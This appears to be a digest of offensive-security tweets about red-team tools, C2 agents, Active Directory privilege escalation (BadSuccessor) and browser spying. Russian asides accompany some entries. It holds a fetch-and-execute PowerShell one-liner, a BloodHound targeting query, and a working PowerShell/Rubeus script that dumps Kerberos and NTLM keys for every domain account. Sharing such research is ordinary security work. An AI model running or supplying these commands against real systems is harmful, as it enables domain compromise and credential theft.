😈 [ chompie @chompie1337 ]

Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application.

🔗 https://www.ibm.com/think/x-force/operationalizing-browser-exploits-to-bypass-wdac

🐥 [ tweet ]

😈 [ blasty @bl4sty ]

ok ok fine, for old time's sake

🔗 https://haxx.in/files/limit-your-screentime.sh

🐥 [ tweet ]

😈 [ Oliver Lyak @ly4k_ ]

The Future of Certipy and the Release of v5 & ESC16 👇

🔗 https://github.com/ly4k/Certipy/discussions/270

🐥 [ tweet ]

😈 [ Bad Sector Labs @badsectorlabs ]

Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:

🔗 https://github.com/badsectorlabs/ludus_adaptix_c2

🐥 [ tweet ]

😈 [ mpgn @mpgn_x64 ]

Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! 🔥

You can build the lab and pwn the AD — 13 flags to capture! No public write-up exists yet — waiting for someone to submit one!

🔗 https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024

🐥 [ tweet ]

😈 [ Matt Ehrnschwender @M_alphaaa ]

I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.

🔗 https://github.com/MythicAgents/tetanus

🐥 [ tweet ]

эх вот би все в мире переписать на раст 🦀 👍🏻 🦀 👍🏻

😈 [ Steve S. @0xTriboulet ]

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.

🔗 https://github.com/0xTriboulet/rssh-rs

🐥 [ tweet ]

😈 [ Yehuda Smirnov @yudasm_ ]

What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:

🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/

🐥 [ tweet ]

😈 [ es3n1n @es3n1n ]

one-liner powershell.. so cool

irm https://dnot.sh/ | iex

🐥 [ tweet ]

😈 [ Yuval Gordon @YuG0rd ]

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here -

🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

🐥 [ tweet ]

😈 [ Bad Sector Labs @badsectorlabs ]

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem contains '2025') AND (c2.name IN dcs) RETURN c2.name

If this query hits, you're in.

🐥 [ tweet ][ quote ]

😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]

😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]

😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.

🐥 [ tweet ]

какой же разъеб 😂🤣

upd. автор делает что-то типа такого, если что, со своей версией рубеуса:

$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}

😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]

⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!

😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]

😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/

🐥 [ tweet ]

😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/

🐥 [ tweet ]